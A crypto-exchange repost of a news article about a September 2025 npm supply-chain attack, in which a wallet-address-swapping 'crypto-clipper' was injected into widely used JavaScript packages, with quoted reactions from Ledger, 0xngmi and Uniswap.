Recommended

#BTCCOGWEEK: Celebrate the Classics of Meme Coins
Crypto Deposit Make instant crypto transfers to your futures account
USDT-M Perpetual Futures Trade futures contracts settled in USDT
VIP Fee Discounts Enjoy different fee discounts based on your VIP level
Coin-M Perpetual Futures Trade futures contracts settled in cryptocurrency
Fiat Deposit Buy your favourite coins in seconds
Affiliates Invite friends & get rewarded
Convert Covert your crypto instantly
Support Centre Find our FAQs here
Announcements Find all our official announcements
BTCC Academy Learn about blockchain and crypto
News The latest trends in the crypto market

Promotions

Referral
Campaigns
Assets
Crypto Deposit
Fiat Deposit
Convert
Transfer
Withdraw
My vouchers
Fund history
Dashboard
Account Security
Identity verification
API Management
Transaction Report
Log out
Register
BTCC / BTCC Square / Cryptopotato /
Crypto-Stealing Malware Breaches Core JavaScript Libraries - Millions of Developers at Risk

Crypto-Stealing Malware Breaches Core JavaScript Libraries - Millions of Developers at Risk

Author:
Cryptopotato
Published:
2025-09-09 22:03:31
9
3

Crypto-Stealing Malware Infiltrates Core JavaScript Libraries Used by Millions

Malicious code infiltrates foundational web development tools—threatening crypto wallets and exchange integrations worldwide.

Supply Chain Sabotage

The attack targets widely-used npm packages, injecting stealthy cryptocurrency theft scripts into applications that handle digital asset transactions. Security researchers confirm the malware specifically hunts for wallet private keys and exchange API credentials.

Web Infrastructure Under Siege

This isn't just another security flaw—it's a direct assault on the financial plumbing of web3. The malware operates during runtime, bypassing conventional security checks while maintaining perfect camouflage within legitimate code.

Wake-Up Call for Crypto Security

While traditional finance still debates blockchain adoption, crypto-native infrastructure faces sophisticated threats that move faster than compliance committees. The irony? Wall Street's 'too risky' digital assets are now being stolen through the very legacy web systems they refuse to abandon.

Crypto Clipper Malware

The malicious code was a “crypto-clipper” designed to steal cryptocurrency by swapping wallet addresses in network requests and hijacking crypto transactions directly. It was also heavily obfuscated to avoid detection.

The crypto-stealing malware has two attack vectors. When no crypto wallet extension is found, the malware intercepts all network traffic by replacing the browser’s native fetch and HTTP request functions with extensive lists of attacker-owned wallet addresses.

Using sophisticated address swapping, it employs algorithms to find replacement addresses that look visually similar to legitimate ones, making the fraud nearly impossible to spot with the naked eye, said cybersecurity researchers.

If a crypto wallet is found, the malware intercepts transactions before signing, and when users initiate transactions, it modifies them in memory to redirect funds to attacker addresses.

The attack targeted packages such as ‘chalk,’ ‘strip-ansi,’ ‘color-convert,’ and ‘color-name,’ which are Core building blocks buried deep in the dependency trees of countless projects.

The attack was discovered accidentally when a build pipeline failed with a “fetch is not defined” error as the malware attempted to exfiltrate data using the fetch function.

“If you use a hardware wallet, pay attention to every transaction before signing, and you’re safe. If you don’t use a hardware wallet, refrain from making any on-chain transactions for now,” advised Ledger CEO Charles Guillemet.

Explanation of the current npm hack

In any website that uses this hacked dependency, it gives a chance to the hacker to inject malicious code, so for example when you click a “swap” button on a website, the code might replace the tx sent to your wallet with a tx sending money to…

— 0xngmi (@0xngmi) September 8, 2025

Broad Attack Vector

While the malware’s payload specifically targets cryptocurrency, the attack vector is much broader. It affects any environment running JavaScript/Node.js applications, such as web applications running in browsers, desktop applications, server-side Node.js applications, and mobile apps using JavaScript frameworks.

So a regular business web application could unknowingly include these malicious packages, but the malware WOULD only activate when users interact with cryptocurrency on that site.

Uniswap and Blockstream were among the first to reassure users that their systems were not at risk.

Regarding the reports of the NPM supply chain attack:

Uniswap apps are not at risk

Our team has confirmed that we do not use any vulnerable versions of the affected packages

As always, be vigilant

Uniswap Labs (@Uniswap) September 8, 2025

|Square

Get the BTCC app to start your crypto journey

Download on the App Store GEI IT ON Google Play

Get started today Scan to join our 100M+ users

Exchange for a better future

Products
Services
Guides
About Us
Terms & Agreement
Customer Service
Social Media

Risk warning: Digital asset trading is an emerging industry with bright prospects, but it also comes with huge risks as it is a new market. The risk is especially high in leveraged trading since leverage magnifies profits and amplifies risks at the same time. Please make sure you have a thorough understanding of the industry, the leveraged trading models, and the rules of trading before opening a position. Additionally, we strongly recommend that you identify your risk tolerance and only accept the risks you are willing to take. All trading involves risks, so you must be cautious when entering the market.

The world’s longest-running cryptocurrency exchange since 2011 © 2011 - 2025 BTCC.com. All rights reserved